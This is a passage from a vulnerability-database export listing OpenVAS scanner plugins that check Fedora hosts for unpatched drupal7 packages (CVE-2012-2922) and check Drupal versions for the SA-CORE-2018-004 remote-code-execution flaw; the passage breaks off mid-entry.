security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:06:31", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16442", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-04T00:00:00", "id": "OPENVAS:864820", "href": "http://plugins.openvas.org/nasl.php?oid=864820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16442\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090861.html\");\n script_id(864820);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:11 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-16442\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16442\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1092", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865259", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1092\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097630.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865259\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:33 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2013-1092\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1092\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-d3f4eb1f9f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310875726", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875726", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875726\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:17:45 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-d3f4eb1f9f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d3f4eb1f9f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5UKYWO2565POL24GEOZHWPYTYPN6T3S\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2018-d3f4eb1f9f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.60~2.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:56:58", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8362", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:864275", "href": "http://plugins.openvas.org/nasl.php?oid=864275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8362\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081661.html\");\n script_id(864275);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:41 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-8362\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8362\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:52", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16442", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16442\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090861.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864820\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:11 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-16442\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16442\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8398", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864328", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864328", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8398\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081721.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864328\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:03:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-8398\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8398\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-26T11:09:28", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1092", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:865259", "href": "http://plugins.openvas.org/nasl.php?oid=865259", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1092\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097630.html\");\n script_id(865259);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:33 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2013-1092\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1092\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864824", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090859.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864824\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:22 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-16421\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16421\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution 